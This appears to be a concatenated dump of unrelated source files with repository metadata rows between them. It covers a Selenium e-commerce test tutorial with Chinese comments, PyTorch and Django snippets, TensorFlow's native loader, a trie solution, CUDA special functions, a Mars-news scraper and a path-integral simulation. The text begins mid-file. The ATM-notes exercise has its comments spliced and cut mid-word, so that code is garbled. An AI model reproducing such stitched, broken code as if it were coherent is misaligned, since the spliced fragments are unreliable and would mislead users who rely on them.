# arguments是参数数组,指的是js字符串后面的所有参数
# 一般情况下我们只会用到argument[0],即js后面的第一个字符串
driver.execute_script("arguments[0].removeAttribute('target')", login_link)
login_link.click()
# 执行成功的自己写登录
driver.find_element_by_id("username").send_keys("changcheng")
ActionChains(driver).send_keys(Keys.TAB).send_keys("123654").send_keys(Keys.ENTER).perform()
# 返回商城首页
driver.find_element_by_link_text("进入商城购物").click()
# 搜索iphone
driver.find_element_by_name("keyword").send_keys("iphone")
driver.find_element_by_name("keyword").submit()
# 点击商品(用这种方法,再实现一次不打开新窗口)
# 使用javascript删除a标签的target属性
# 因为img没有target属性,所以我们复制css的时候要找它的父节点a标签
# 复制出来的css往往比较长,我们可以适当的缩写长度
# 我们定位元素的目标节点是最后一个节点,
# 大于号>的前面是父节点,后面是子节点
# 每个节点的第一个单词是标签名,比a,div,body
# 小数点后面表示class属性
# :nth-child(2), nth表示第几个4th,5th,nth表示第n个, child表示子节点
# 所以.:nth-child(2)表示当前标签是它的父节点的第二个子节点
product_link_css = "div.protect_con > div:nth-child(2) > div.shop_01-imgbox > a"
# 通过xpath定位元素
iphone = driver.find_element_by_css_selector(product_link_css)
# 删除元素的target属性
driver.execute_script("arguments[0].removeAttribute('target')", iphone)
iphone.click()
# 在商品详情界面,点击加入购物车
driver.find_element_by_id("joinCarButton").click()
# driver.find_element_by_class_name("shopCar_T_span3").click()
driver.find_element_by_css_selector(".shopCar_T_span3").click()
# 点击结算按钮
# 在每个class前面都加一个小数点,并且去掉中间的空格, 我们就可以同时用两个属性定位一个元素
driver.find_element_by_css_selector(".shopCar_btn_03.fl").click()
# 点击添加新地址
driver.find_element_by_css_selector(".add-address").click()
# 输入收货人等信息(选择地区下午讲)
driver.find_element_by_name("address[address_name]").send_keys("张三")
driver.find_element_by_name("address[mobile]").send_keys("13123412345")
dropdown1 = driver.find_element_by_id("add-new-area-select")
# 下拉框是一种特殊的网页元素, 对下拉框的操作和普通网页元素不太一样
# Selenium为这种特殊的元素,专门创建了一个类Select
# dropdown1的类型是一个普通的网页元素, 下面这句代码的意思是,
# 把一个普通的网页元素,转换成一个下拉框的特殊网页元素
print(type(dropdown1)) # dropdown是WebElement类型
# WebElement这个类中,只有click和send_keys这样的方法,没有选择下拉框选项的方法
select1 = Select(dropdown1)
print(type(select1)) # select1是Select类型
# 转换成select类型之后,网页元素还是那个元素,但是Select类中有选择选项的方法
select1.select_by_value("320000") #这时,我们就可以通过选项的值来定位
time.sleep(2)
select1.select_by_visible_text("辽宁省") #也可通过选项的文本信息来定位
# 尝试一下,选择沈阳市
# 因为是动态id,所以不能通过id定位
# 因为class重复,所以我们也不能直接用class定位
# 但是我们可以用find_elements的方法,先找到页面中所有class=add-new-area-select的元素,
# 然后在通过下标的方式选择第n个页面元素,
# 这种方法类似于以前学的javascript方法
dropdown2 = driver.find_elements_by_class_name("add-new-area-select")[1]
Select(dropdown2).select_by_visible_text("沈阳市")
# 自己选一个铁西区
# driver.find_elements_by_class_name("add-new-area-select")[2]等同于下面这句
# tag_name()这个方法,大多数情况都能找到一堆元素,
# 所以 find_element_tag_name()这个方法很少用
# 但是 find_elements_tag_name()[n]这个方法比较常用
dropdown3 = driver.find_elements_by_tag_name("select")[2]
Select(dropdown3).select_by_visible_text("铁西区")
# 点击点击,保存收获人信息 | [
"51Testing"
] | 51Testing |
71a6bd882187409a56532f89178daad5194be49b | b69e8fd894a6f5d865911c4ec0f0d8b92b2aa6ac | /torchtools/meters/vision/utils.py | bb0ebf46ae421b97d654ea8b785a79ef42f7d147 | [
"BSD-3-Clause"
] | permissive | Time1ess/torchtools | 7338d65de87e0665f7ec90b71cfa439c5bd20201 | 1c48591188827f8a7403162728f86229203354c5 | refs/heads/master | 2021-01-23T10:29:14.707874 | 2018-04-30T13:51:03 | 2018-04-30T13:51:03 | 102,616,366 | 20 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,681 | py | #!/usr/bin/env python3
# coding: UTF-8
# Author: David
# Email: youchen.du@gmail.com
# Created: 2017-09-07 21:24
# Last modified: 2017-09-11 14:41
# Filename: utils.py
# Description:
import numpy as np
from PIL import Image
from torchvision import transforms as T
def fast_hist(label_true, label_pred, n_class):
mask = (label_true >= 0) & (label_true < n_class)
hist = np.bincount(
n_class * label_true[mask].astype(int) +
label_pred[mask], minlength=n_class ** 2).reshape(n_class, n_class)
return hist
def label_accuracy_score(label_trues, label_preds, n_class):
"""Returns accuracy score evaluation result.
- overall accuracy
- mean accuracy
- mean IU
- fwavacc
"""
hist = np.zeros((n_class, n_class))
for lt, lp in zip(label_trues, label_preds):
hist += fast_hist(lt.flatten(), lp.flatten(), n_class)
acc = np.diag(hist).sum() / hist.sum()
acc_cls = np.diag(hist) / hist.sum(axis=1)
acc_cls = np.nanmean(acc_cls)
iu = np.diag(hist) / (hist.sum(axis=1) + hist.sum(axis=0) - np.diag(hist))
mean_iu = np.nanmean(iu)
freq = hist.sum(axis=1) / hist.sum()
fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()
return acc, acc_cls, mean_iu, fwavacc
def build_ss_img_tensor(result, palette):
"""
Build a Semantic result image from output with palette.
Parameters:
* result(torch.Tensor): H x W, pixel classification result
* palette(PIL.ImagePalette): Palette
Return:
* img(torch.Tensor): 3 x H x W
"""
img = Image.fromarray(np.uint8(result), mode='P')
img.putpalette(palette)
img = img.convert()
return T.ToTensor()(img)
| [
"youchen.du@gmail.com"
] | youchen.du@gmail.com |
82d6814e4d27a3788157089c8a2a263b4363893e | afea9757be324c8def68955a12be11d71ce6ad35 | /willyanealves/stock/forms.py | 407e6b50c4057c2d0a82a9414ea1c6e7e450cc88 | [] | no_license | bergpb/willyane-alves | c713cac3ec3a68005f3b8145985693d2477ba706 | 8b2b9922ba35bf2043f2345228f03d80dbd01098 | refs/heads/master | 2023-02-10T19:57:50.893172 | 2021-01-11T16:17:14 | 2021-01-11T16:17:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | from django import forms
from .models import Stock
class StockForm(forms.ModelForm):
class Meta:
model = Stock
fields = '__all__' | [
"jocsadm@gmail.com"
] | jocsadm@gmail.com |
f0df8ddacc4971ea3a805b59733696e807131ade | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4344/codes/1601_820.py | db86b249dcf1f032dea7ef1432b9d829cfe91fe5 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | #ade de notas de R$ 50
#valor = notas//50
# Valo# Instituto de Computacao - UFAM
# Lab 01 - Ex 10
# 20 / 05 / 2016
VALOR = int(input("Qual o valor do saque? "))
if VALOR>0 and VALOR%2==0:
nota50 = VALOR//50
aux1 = nota50*50
nota10 = (VALOR - aux1)//10
aux2 = nota10*10
nota2 = (VALOR-aux1-aux2)//2
print(nota50)
print(nota10)
print(nota2)
# Quantid | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
102768d7be696f42c91dcd129d83ccad74435d56 | b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1 | /tensorflow/python/pywrap_tensorflow.py | f216bccfdfe37ae2e5ed7e2535ac4c5360a2fd71 | [
"Apache-2.0"
] | permissive | uve/tensorflow | e48cb29f39ed24ee27e81afd1687960682e1fbef | e08079463bf43e5963acc41da1f57e95603f8080 | refs/heads/master | 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 | Apache-2.0 | 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null | UTF-8 | Python | false | false | 3,257 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""A wrapper for TensorFlow SWIG-generated bindings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ctypes
import sys
import traceback
from tensorflow.python.platform import self_check
# Perform pre-load sanity checks in order to produce a more actionable error
# than we get from an error during SWIG import.
self_check.preload_check()
# pylint: disable=wildcard-import,g-import-not-at-top,unused-import,line-too-long
try:
# This import is expected to fail if there is an explicit shared object
# dependency (with_framework_lib=true), since we do not need RTLD_GLOBAL.
from tensorflow.python import pywrap_dlopen_global_flags
_use_dlopen_global_flags = True
except ImportError:
_use_dlopen_global_flags = False
# On UNIX-based platforms, pywrap_tensorflow is a SWIG-generated
# python library that dynamically loads _pywrap_tensorflow.so.
_can_set_rtld_local = (hasattr(sys, 'getdlopenflags')
and hasattr(sys, 'setdlopenflags'))
if _can_set_rtld_local:
_default_dlopen_flags = sys.getdlopenflags()
try:
if _use_dlopen_global_flags:
pywrap_dlopen_global_flags.set_dlopen_flags()
elif _can_set_rtld_local:
# Ensure RTLD_LOCAL behavior for platforms where it isn't the default
# (macOS). On Linux RTLD_LOCAL is 0, so this does nothing (and would not
# override an RTLD_GLOBAL in _default_dlopen_flags).
sys.setdlopenflags(_default_dlopen_flags | ctypes.RTLD_LOCAL)
from tensorflow.python.pywrap_tensorflow_internal import *
from tensorflow.python.pywrap_tensorflow_internal import __version__
from tensorflow.python.pywrap_tensorflow_internal import __git_version__
from tensorflow.python.pywrap_tensorflow_internal import __compiler_version__
from tensorflow.python.pywrap_tensorflow_internal import __cxx11_abi_flag__
from tensorflow.python.pywrap_tensorflow_internal import __monolithic_build__
if _use_dlopen_global_flags:
pywrap_dlopen_global_flags.reset_dlopen_flags()
elif _can_set_rtld_local:
sys.setdlopenflags(_default_dlopen_flags)
except ImportError:
msg = """%s\n\nFailed to load the native TensorFlow runtime.\n
See https://www.tensorflow.org/install/errors\n
for some common reasons and solutions. Include the entire stack trace
above this error message when asking for help.""" % traceback.format_exc()
raise ImportError(msg)
# pylint: enable=wildcard-import,g-import-not-at-top,unused-import,line-too-long
| [
"v-grniki@microsoft.com"
] | v-grniki@microsoft.com |
d8ff438375b4bdd79ecfba103c5f65afd2bcb714 | 47c4267477aac784a83ac241465263585637781d | /fb高频/211.py | 61dac80b450b518b05bf788a7dc59022fbacf1a3 | [] | no_license | MengSunS/daily-leetcode | af011a66213fabcec792c0f8280a03aa805a56ec | 22c76118bb46fadd2b137fd1a3d40e20fd7538e5 | refs/heads/main | 2023-08-21T21:35:19.250506 | 2021-10-12T00:23:09 | 2021-10-12T00:23:09 | 306,220,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | class TrieNode():
def __init__(self):
self.children = collections.defaultdict(TrieNode)
self.isWord = False
class WordDictionary:
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TrieNode()
def addWord(self, word: str) -> None:
node = self.root
for ch in word:
node = node.children[ch]
node.isWord = True
def search(self, word: str) -> bool:
node = self.root
return self.dfs(node, 0, word)
def dfs(self, node, i, word):
if i == len(word):
if node.isWord:
return True
return False
if word[i] == '.':
for n in node.children.values():
if self.dfs(n, i + 1, word):
return True
else:
node = node.children.get(word[i])
if not node:
return False
return self.dfs(node, i + 1, word)
# Your WordDictionary object will be instantiated and called as such:
# obj = WordDictionary()
# obj.addWord(word)
# param_2 = obj.search(word)
| [
"sunx0585@umn.edu"
] | sunx0585@umn.edu |
5bc81745f1d0aa833f2ad310a6858f6d862fc629 | a1711d3ba173bcf39a1c6ea4aa91013501c090c3 | /0x0B-python-input_output/10-class_to_json.py | 974b65033cac85098a58c40e61f1c1fb93ac7c38 | [] | no_license | veeteeran/holbertonschool-higher_level_programming | 5115a28c5f9979a146b5c0ed6d9a9d64420dcf4b | 081705945b8a8850bd3b1c416c382637fae79646 | refs/heads/master | 2022-12-14T18:25:54.239460 | 2020-09-25T01:09:05 | 2020-09-25T01:09:05 | 259,425,025 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 335 | py | #!/usr/bin/python3
"""Docstring for class_to_json"""
def class_to_json(obj):
"""
Returns the dictionary description with simple data structure
(list, dictionary, string, integer and boolean) for JSON
serialization of an object
Parameter:
obj: instance of a Class
"""
return obj.__dict__
| [
"vietnamtran@gmail.com"
] | vietnamtran@gmail.com |
d4a2405378c3de1290dcd43aef5f65c68b279f6b | 386a5b505d77c9798aaab78495d0f00c349cf660 | /Prognos Project/Working/Piyush Jiwane Git/Project/SearchPortal/questionnaireApp/urls.py | a954ca7fb967835830274b6c83975983ed14e83b | [] | no_license | namratarane20/MachineLearning | 2da2c87217618d124fd53f607c20641ba44fb0b7 | b561cc74733b655507242cbbf13ea09a2416b9e2 | refs/heads/master | 2023-01-20T18:54:15.662179 | 2020-03-09T14:12:44 | 2020-03-09T14:12:44 | 237,597,461 | 0 | 0 | null | 2023-01-05T12:37:12 | 2020-02-01T10:22:20 | Python | UTF-8 | Python | false | false | 1,173 | py | from django.urls import path,re_path
from . import views
#
# urlpatterns = [
# path('', views.userLogin),
# path('mailVerification', views.mailVerification),
# path('searchKeyword', views.searchKeyword),
# path('uploadcsv', views.uploadcsv),
# path('homepage', views.toHomePage),
# path('indexfile', views.indexToElasticsearch)
# ]
urlpatterns = [
path('', views.Home),
path('searchKeyword', views.searchKeyword ,name="searchKeyword"),
path('searchKeyword/<str:recentSearch>', views.recentSearchKeyword, name="recentSearchKeyword"),
path('account/logout/', views.Logout),
path('adminLogin', views.adminLogin),
path('adminMailVerification', views.adminMailVerification),
path('indexQuestionnaireFile', views.indexQuestionnaireFile),
path('indexPoliciesFile', views.indexPoliciesFile),
path('toHomePage', views.toHomePage),
path('addToTags',views.addToTags),
# path('dispalyTagName',views.dispalyTagName),
path('destroyTag', views.destroyTagInformation),
path("/<str:tagname>", views.displayTagInformation, name='displayTagInfo'),
path('displayTagInformation',views.displayTagInformation),
]
| [
"namrata.ashok@impelsys.com"
] | namrata.ashok@impelsys.com |
66bd1d94ba94629eca7202be8c0653b0e0efebbb | f1cb404ea95f4527ffeaf6a7fe8db9a2a1990f12 | /scikits/cuda/special.py | 4a1081fee13facf5d7818ebdbded9cd221c4cb7f | [
"BSD-3-Clause"
] | permissive | sequoiar/scikits.cuda | c0821502b7dc90d818669e20f2fa1858f1a78e82 | 79b62904a726d45066351c38b4274b1ecc985e47 | refs/heads/master | 2020-12-25T07:39:47.594383 | 2011-03-30T14:39:20 | 2011-03-30T14:39:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,139 | py | #!/usr/bin/env python
"""
PyCUDA-based special functions.
"""
import os
from string import Template
import pycuda.gpuarray as gpuarray
from pycuda.compiler import SourceModule
import numpy as np
from misc import get_dev_attrs, select_block_grid_sizes, init, get_current_device
# Get installation location of C headers:
from . import install_headers
# Adapted from Cephes library:
sici_mod_template = Template("""
#include "cuSpecialFuncs.h"
#if ${use_double}
#define FLOAT double
#define SICI(x, si, ci) sici(x, si, ci)
#else
#define FLOAT float
#define SICI(x, si, ci) sicif(x, si, ci)
#endif
__global__ void sici_array(FLOAT *x, FLOAT *si,
FLOAT *ci, unsigned int N) {
unsigned int idx = blockIdx.y*blockDim.x*gridDim.x+
blockIdx.x*blockDim.x+threadIdx.x;
FLOAT si_temp, ci_temp;
if (idx < N) {
SICI(x[idx], &si_temp, &ci_temp);
si[idx] = si_temp;
ci[idx] = ci_temp;
}
}
""")
def sici(x_gpu):
"""
Sine/Cosine integral.
Computes the sine and cosine integral of every element in the
input matrix.
Parameters
----------
x_gpu : GPUArray
Input matrix of shape `(m, n)`.
Returns
-------
(si_gpu, ci_gpu) : tuple of GPUArrays
Tuple of GPUarrays containing the sine integrals and cosine
integrals of the entries of `x_gpu`.
Examples
--------
>>> import pycuda.gpuarray as gpuarray
>>> import pycuda.autoinit
>>> import numpy as np
>>> import scipy.special
>>> import special
>>> x = np.array([[1, 2], [3, 4]], np.float32)
>>> x_gpu = gpuarray.to_gpu(x)
>>> (si_gpu, ci_gpu) = sici(x_gpu, pycuda.autoinit.device)
>>> (si, ci) = scipy.special.sici(x)
>>> np.allclose(si, si_gpu.get())
True
>>> np.allclose(ci, ci_gpu.get())
True
"""
if x_gpu.dtype == np.float32:
use_double = 0
elif x_gpu.dtype == np.float64:
use_double = 1
else:
raise ValueError('unsupported type')
# Get block/grid sizes:
dev = get_current_device()
block_dim, grid_dim = select_block_grid_sizes(dev, x_gpu.shape)
# Set this to False when debugging to make sure the compiled kernel is
# not cached:
cache_dir=None
sici_mod = \
SourceModule(sici_mod_template.substitute(use_double=use_double),
cache_dir=cache_dir,
options=["-I", install_headers])
sici_func = sici_mod.get_function("sici_array")
si_gpu = gpuarray.empty_like(x_gpu)
ci_gpu = gpuarray.empty_like(x_gpu)
sici_func(x_gpu, si_gpu, ci_gpu,
np.uint32(x_gpu.size),
block=block_dim,
grid=grid_dim)
return (si_gpu, ci_gpu)
# Adapted from specfun.f in scipy:
e1z_mod_template = Template("""
#include <pycuda/pycuda-complex.hpp>
#define PI 3.1415926535897931
#define EL 0.5772156649015328
#if ${use_double}
#define FLOAT double
#define COMPLEX pycuda::complex<double>
#else
#define FLOAT float
#define COMPLEX pycuda::complex<float>
#endif
__device__ COMPLEX _e1z(COMPLEX z) {
FLOAT x = real(z);
FLOAT a0 = abs(z);
COMPLEX ce1, cr, ct0, kc, ct;
if (a0 == 0.0)
ce1 = COMPLEX(1.0e300, 0.0);
else if ((a0 < 10.0) || (x < 0.0 && a0 < 20.0)) {
ce1 = COMPLEX(1.0, 0.0);
cr = COMPLEX(1.0, 0.0);
for (int k = 1; k <= 150; k++) {
cr = -(cr * FLOAT(k) * z)/COMPLEX((k + 1.0) * (k + 1.0), 0.0);
ce1 = ce1 + cr;
if (abs(cr) <= abs(ce1)*1.0e-15)
break;
}
ce1 = COMPLEX(-EL,0.0)-log(z)+(z*ce1);
} else {
ct0 = COMPLEX(0.0, 0.0);
for (int k = 120; k >= 1; k--) {
kc = COMPLEX(k, 0.0);
ct0 = kc/(COMPLEX(1.0,0.0)+(kc/(z+ct0)));
}
ct = COMPLEX(1.0, 0.0)/(z+ct0);
ce1 = exp(-z)*ct;
if (x <= 0.0 && imag(z) == 0.0)
ce1 = ce1-COMPLEX(0.0, -PI);
}
return ce1;
}
__global__ void e1z(COMPLEX *z, COMPLEX *e,
unsigned int N) {
unsigned int idx = blockIdx.y*blockDim.x*gridDim.x+
blockIdx.x*blockDim.x+threadIdx.x;
if (idx < N)
e[idx] = _e1z(z[idx]);
}
""")
def e1z(z_gpu):
"""
Exponential integral with `n = 1` of complex arguments.
Parameters
----------
x_gpu : GPUArray
Input matrix of shape `(m, n)`.
Returns
-------
e_gpu : GPUArray
GPUarrays containing the exponential integrals of
the entries of `z_gpu`.
Examples
--------
>>> import pycuda.gpuarray as gpuarray
>>> import pycuda.autoinit
>>> import numpy as np
>>> import scipy.special
>>> import special
>>> z = np.asarray(np.random.rand(4, 4)+1j*np.random.rand(4, 4), np.complex64)
>>> z_gpu = gpuarray.to_gpu(z)
>>> e_gpu = e1z(z_gpu, pycuda.autoinit.device)
>>> e_sp = scipy.special.exp1(z)
>>> np.allclose(e_sp, e_gpu.get())
True
"""
if z_gpu.dtype == np.complex64:
use_double = 0
elif z_gpu.dtype == np.complex128:
use_double = 1
else:
raise ValueError('unsupported type')
# Get block/grid sizes; the number of threads per block is limited
# to 256 because the e1z kernel defined above uses too many
# registers to be invoked more threads per block:
dev = get_current_device()
max_threads_per_block = 256
block_dim, grid_dim = select_block_grid_sizes(dev, z_gpu.shape, max_threads_per_block)
# Set this to False when debugging to make sure the compiled kernel is
# not cached:
cache_dir=None
e1z_mod = \
SourceModule(e1z_mod_template.substitute(use_double=use_double),
cache_dir=cache_dir)
e1z_func = e1z_mod.get_function("e1z")
e_gpu = gpuarray.empty_like(z_gpu)
e1z_func(z_gpu, e_gpu,
np.uint32(z_gpu.size),
block=block_dim,
grid=grid_dim)
return e_gpu
if __name__ == "__main__":
import doctest
doctest.testmod()
| [
"lev@columbia.edu"
] | lev@columbia.edu |
9985402449b77dd2fda3edef41399a64fc307d8c | 146819090fefeaddeadad8d4659919868e893537 | /cvproject/Lib/site-packages/djmoney/forms/widgets.py | c16a5515a4cb635ad1f087126052151d8ddb48fb | [
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-newlib-historical",
"OpenSSL",
"bzip2-1.0.6",
"Python-2.0",
"TCL",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-other-copyleft"
] | permissive | MdReyajuddin/Big-Project-Codes | d5ec071bc5efc65ebdd07e757139a8ee67359706 | 79ab22f2f51e29e2ff17f680306877559c719a56 | refs/heads/master | 2022-12-01T04:17:39.138523 | 2020-03-17T18:51:40 | 2020-03-17T18:51:40 | 248,046,679 | 0 | 0 | BSD-3-Clause | 2022-11-22T04:40:11 | 2020-03-17T18:40:05 | Python | UTF-8 | Python | false | false | 874 | py | # -*- coding: utf-8 -*-
from django.forms import MultiWidget, Select, TextInput
from ..settings import CURRENCY_CHOICES
__all__ = ("MoneyWidget",)
class MoneyWidget(MultiWidget):
def __init__(
self,
choices=CURRENCY_CHOICES,
amount_widget=TextInput,
currency_widget=None,
default_currency=None,
*args,
**kwargs
):
self.default_currency = default_currency
if not currency_widget:
currency_widget = Select(choices=choices)
widgets = (amount_widget, currency_widget)
super(MoneyWidget, self).__init__(widgets, *args, **kwargs)
def decompress(self, value):
if value is not None:
if isinstance(value, (list, tuple)):
return value
return [value.amount, value.currency]
return [None, self.default_currency]
| [
"md.reyajuddin45@gmail.com"
] | md.reyajuddin45@gmail.com |
0764bdbf763f0bf71ecedac5f306b8263fc7c589 | c08b5edb5075e7840e716b0a09006dae0a4d05ac | /.history/Missions_to_Mars/scrape_mars_20200812110529.py | dad4048c45ed15c13a2ed258346030ab05ae1724 | [] | no_license | OlgaDlzk/web-scraping-challenge-1 | 06f915eb76c55c9bc37889017dd9af81122dc1a5 | f99c3436dfb0169595c46dae7733d90e21385cc6 | refs/heads/master | 2023-03-18T00:58:37.928024 | 2020-09-22T20:32:47 | 2020-09-22T20:32:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,710 | py | from splinter import Browser
from bs4 import BeautifulSoup as bs
import pandas as pd
import time
import re
# This is for debugging
def savetofile(contents):
file = open('_temporary.txt',"w",encoding="utf-8")
file.write(contents)
file.close()
def scrape():
executable_path = {"executable_path": "chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
# NASA Mars News
url = 'https://mars.nasa.gov/news/'
browser.visit(url)
time.sleep(3)
html = browser.html
soup = bs(html, 'html.parser')
slides = soup.find_all('li', class_='slide')
content_title = slides[0].find('div', class_='content_title')
news_title = content_title.text.strip()
article_teaser_body = slides[0].find('div', class_='article_teaser_body')
news_p = article_teaser_body.text.strip()
# JPL Mars Space Images
base_url = 'https://www.jpl.nasa.gov'
url = base_url + '/spaceimages/?search=&category=Mars'
browser.visit(url)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
featured_image_url = base_url + soup.find('a',class_='button fancybox')['data-fancybox-href']
# Mars Weather
mars_weather = []
url = 'https://twitter.com/marswxreport?lang=en'
browser.visit(url)
time.sleep(3)
weather_html = browser.html
soup = bs(weather_html, "html.parser")
weather_html = browser.html
soup = bs(weather_html, "html.parser")
# print(weathersoup.prettify())
mars_tweets = [soup.find_all('p', class_="TweetTextSize"), soup.find_all(
'span', class_="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0")]
for tweets in mars_tweets:
mars_tweet = tweets
for tweet in mars_tweet:
if 'InSight' in tweet.text:
mars_weather = tweet.text
if tweet.a in tweet:
mars_weather = mars_weather.strip(tweet.a.text)
break
# Mars facts
url = 'https://space-facts.com/mars/'
browser.visit(url) # not necessary, but added for checking the operation
time.sleep(1)
dfs = pd.read_html(url)
for df in dfs:
try:
df = df.rename(columns={0: "Description", 1: "Value"})
df = df.set_index("Description")
marsfacts_html = df.to_html().replace('\n', '')
# df.to_html('marsfacts.html') # to save to a file to test
break
except:
continue
# Mars Hemispheres
base_url = 'https://astrogeology.usgs.gov'
url = base_url + '/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'
browser.visit(url)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
items = soup.find_all('div', class_='item')
urls = []
titles = []
for item in items:
urls.append(base_url + item.find('a')['href'])
titles.append(item.find('h3').text.strip())
img_urls = []
for oneurl in urls:
browser.visit(oneurl)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
oneurl = base_url+soup.find('img',class_='wide-image')['src']
img_urls.append(oneurl)
hemisphere_image_urls = []
for i in range(len(titles)):
hemisphere_image_urls.append({'title':titles[i],'img_url':img_urls[i]})
# Assigning scraped data to a page
marspage = {}
marspage["news_title"] = news_title
marspage["news_p"] = news_p
marspage["featured_image_url"] = featured_image_url
marspage["mars_weather"] = mars_weather
marspage["marsfacts_html"] = marsfacts_html
marspage["hemisphere_image_urls"] = hemisphere_image_urls
return marspage
| [
"ermiasgelaye@gmail.com"
] | ermiasgelaye@gmail.com |
6655971d554a867325a97ca8bb88cc7028197341 | ded10c2f2f5f91c44ec950237a59225e8486abd8 | /.history/2/path_integral_naive_sampling_20200417194827.py | 27213765902c7bcf85d6811029ac2960cb932a76 | [] | no_license | jearistiz/Statistical-Physics-Projects | 276a86407b32ded4e06b32efb2fadbd8eff8daed | d9c5b16a50856e148dc8604d92b6de3ea21fc552 | refs/heads/master | 2022-11-05T03:41:23.623050 | 2020-06-28T06:36:05 | 2020-06-28T06:36:05 | 254,909,897 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,118 | py | # -*- coding: utf-8 -*-
from __future__ import division
import os
import numpy as np
import matplotlib.pyplot as plt
from time import time
import pandas as pd
# Author: Juan Esteban Aristizabal-Zuluaga
# date: 202004151200
def rho_free(x,xp,beta):
"""Uso: devuelve elemento de matriz dsnsidad para el caso de una partícula libre en un toro infinito."""
return (2.*np.pi*beta)**(-0.5) * np.exp(-(x-xp)**2 / (2 * beta) )
def harmonic_potential(x):
"""Devuelve valor del potencial armónico para una posición x dada"""
return 0.5* x**2
def anharmonic_potential(x):
"""Devuelve valor de potencial anarmónico para una posición x dada"""
# return np.abs(x)*(1+np.cos(x)) #el resultado de este potencial es interesante
return 0.5*x**2 - x**3 + x**4
def QHO_canonical_ensemble(x,beta):
"""
Uso: calcula probabilidad teórica cuántica de encontrar al oscilador armónico
(inmerso en un baño térmico a temperatura inversa beta) en la posición x.
Recibe:
x: float -> posición
beta: float -> inverso de temperatura en unidades reducidas beta = 1/T.
Devuelve:
probabilidad teórica cuántica en posición x para temperatura inversa beta.
"""
return (np.tanh(beta/2.)/np.pi)**0.5 * np.exp(- x**2 * np.tanh(beta/2.))
def path_naive_sampling(N_path = 10,beta = 4., N_iter = int(1e5), delta = 0.5, potential = harmonic_potential, append_every = 1):
"""
Uso:
"""
dtau = beta/N_path
path_x = [0.] * N_path
pathss_x = [path_x[:]]
t_0 = time()
N_iter = int(N_iter)
for step in range(N_iter):
k = np.random.randint(0,N_path)
#Periodic boundary conditions
knext, kprev = (k+1) % N_path, (k-1) % N_path
x_new = path_x[k] + np.random.uniform(-delta,delta)
old_weight = ( rho_free(path_x[kprev],path_x[k],dtau) *
np.exp(- dtau * potential(path_x[k])) *
rho_free(path_x[k],path_x[knext],dtau) )
new_weight = ( rho_free(path_x[kprev],x_new,dtau) *
np.exp(- dtau * potential(x_new)) *
rho_free(x_new,path_x[knext],dtau) )
if np.random.uniform(0,1) < new_weight/old_weight:
path_x[k] = x_new
if step%append_every == 0:
pathss_x.append(path_x[:])
t_1 = time()
print('Path integral naive sampling: %d iterations -> %.2E seconds'%(N_iter,t_1-t_0))
pathss_x = np.array(pathss_x)
return pathss_x
def figures_fn( pathss_x, beta = 4 , N_plot = 201, x_max = 3, N_iter=int(1e5), append_every=1,
N_beta_ticks = 11, msq_file='file.csv', file_name='path-plot-prueba',
show_path=True, show_matrix_squaring=True, save_plot=True, show_plot=True):
script_dir=os.path.dirname(os.path.abspath(__file__))
x_plot = np.linspace(-x_max,x_max,N_plot)
# Agranda letra en texto de figuras generadas
plt.rc('text', usetex=True) #usa latex en texto de figuras
plt.rcParams.update({'font.size':15,'text.latex.unicode':True})
fig, ax1 = plt.subplots()
ax1.set_xlabel(u'$x$')
ax1.set_ylabel(u'$\pi^{(Q)} (x;\\beta)$')
lns1 = ax1.plot(x_plot,QHO_canonical_ensemble(x_plot,beta),label=u'Teórico')
if show_matrix_squaring:
msq_file = script_dir + '/' + msq_file
matrix_squaring_data = pd.read_csv(msq_file, index_col=0, comment='#')
lns2 = ax1.plot( matrix_squaring_data['position_x'],matrix_squaring_data['prob_density'],
label = u'Algoritmo Matrix\nSquaring')
lns3 = ax1.hist(pathss_x[:,0], bins=int(np.sqrt(N_iter/append_every)), normed=True,
label=u'Integral de camino\nnaive sampling')
ax1.tick_params(axis='y')
ax1.set_ylim(bottom=0)
ax1.set_xlim(-x_max,x_max)
if not show_path:
plt.legend(loc = 'best')
if save_plot:
plt.savefig(script_dir+'/'+file_name+'.eps')
if show_plot:
plt.show()
plt.close()
